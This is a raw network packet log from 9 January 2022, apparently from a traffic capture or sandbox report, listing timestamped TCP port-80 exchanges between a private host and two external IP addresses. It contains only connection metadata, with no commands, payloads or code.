Jan 9, 2022 18:48:57.551320076 CET	49877	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:57.609491110 CET	80	49879	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:57.609540939 CET	80	49879	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:57.609669924 CET	49879	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:57.609729052 CET	49879	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:57.721414089 CET	80	49877	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:57.773392916 CET	80	49879	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:57.774213076 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:57.954368114 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:57.955521107 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:57.955610991 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.175544024 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.496680975 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.496738911 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.496772051 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.496803045 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.496870995 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.496942043 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.496962070 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.497009993 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.497031927 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.497070074 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.497108936 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.497133970 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.497168064 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.497241974 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.678096056 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678160906 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678205013 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678241968 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678283930 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.678325891 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678364038 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.678388119 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678445101 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678493977 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678513050 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.678559065 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.678587914 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678631067 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678687096 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678710938 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.678745985 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678795099 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678814888 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.678857088 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678900957 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.678925037 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.678971052 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.679008961 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.679042101 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.679085970 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.679125071 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.679146051 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.679199934 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.679270029 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.859112024 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859184027 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859241009 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859298944 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859359026 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859390020 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.859451056 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859483957 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.859519005 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859541893 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.859579086 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859618902 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859658957 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859677076 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.859716892 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859750986 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.859781981 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859822989 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859862089 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.859889030 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859946012 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.859970093 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.860007048 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860047102 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860085011 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.860102892 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860140085 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860179901 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.860196114 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860235929 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860270023 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.860294104 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860331059 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860378027 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860390902 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.860430002 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860469103 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.860493898 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860546112 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860573053 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.860618114 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860657930 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860692978 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.860726118 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860766888 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860810995 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.860869884 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860924006 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.860960007 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.860985041 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.861026049 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.861071110 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.861083031 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.861120939 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.861155033 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.861179113 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.861217976 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.861251116 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:58.861279964 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:58.861363888 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.043625116 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.043695927 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.043745041 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.043798923 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.043811083 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.043872118 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.043895006 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.043953896 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044009924 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044039011 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.044097900 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044158936 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044183016 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.044238091 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044277906 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044317961 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.044333935 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044372082 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044404030 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.044429064 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044467926 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044500113 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.044538021 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044583082 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044617891 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.044641018 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044694901 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044732094 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.044761896 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044801950 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044842958 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.044929028 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.044985056 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045017004 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.045058966 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045097113 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045140982 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045151949 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.045197010 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045207977 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.045245886 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045281887 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045320988 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045346022 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.045378923 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045418024 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045434952 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.045474052 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045517921 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045527935 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.045577049 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045612097 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.045634031 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045672894 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045711040 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045727015 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.045763016 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045790911 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.045821905 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045861959 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045901060 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045937061 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.045963049 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.045986891 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.046025991 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.046053886 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.046082973 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.046119928 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.046159029 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.046176910 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.046232939 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.225944996 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226017952 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226078987 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226139069 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226203918 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226232052 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.226301908 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226324081 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.226393938 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226409912 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.226464033 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226519108 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226562977 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226597071 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.226624012 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226663113 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226695061 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.226727009 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226748943 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.226789951 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226839066 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226871014 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.226907969 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226946115 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.226980925 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.227001905 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227041006 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227073908 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.227097988 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227147102 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227179050 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.227215052 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227256060 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227302074 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227313995 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.227353096 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227384090 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.227416992 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227458954 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227504969 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227515936 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.227555990 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227588892 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.227612972 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227653980 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227691889 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.227725983 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227763891 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227802038 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.227821112 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227859974 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227889061 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.227916956 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227953911 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.227986097 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.228012085 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.228054047 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.228085041 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.228127003 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.228177071 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.228205919 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.228250027 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.228297949 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.228331089 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.228357077 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.228395939 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.228426933 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.228454113 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.228491068 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.228522062 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.228549004 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.228626966 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.410676003 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.410742044 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.410944939 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.411099911 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411161900 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411221027 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411267042 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.411310911 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411371946 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411393881 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.411453962 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411511898 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411535978 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.411583900 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411623955 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411654949 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.411684036 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411722898 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411752939 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.411780119 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411818981 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411848068 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.411876917 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411915064 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.411950111 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.411973953 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412022114 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412048101 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.412081003 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412120104 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412157059 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412177086 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.412215948 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412244081 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.412276030 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412314892 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412358999 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412369967 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.412409067 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412446976 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412477016 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.412507057 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412544966 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412569046 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.412604094 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412645102 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412663937 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.412702084 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412736893 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.412760019 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412798882 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412836075 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.412944078 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.412951946 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.412993908 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.413033962 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.413073063 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.413113117 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.413149118 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.413171053 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.413207054 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.413235903 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.413264036 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.413302898 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.413320065 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.413360119 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.413403988 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.413415909 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.413453102 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.413491964 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.413516998 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.413594961 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.590784073 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.590858936 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.590905905 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.590936899 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.590997934 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591052055 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591064930 CET	49880	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:59.591109037 CET	80	49880	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:59.591155052 CET	80	49880	47.251.44.201	192.168.2.3
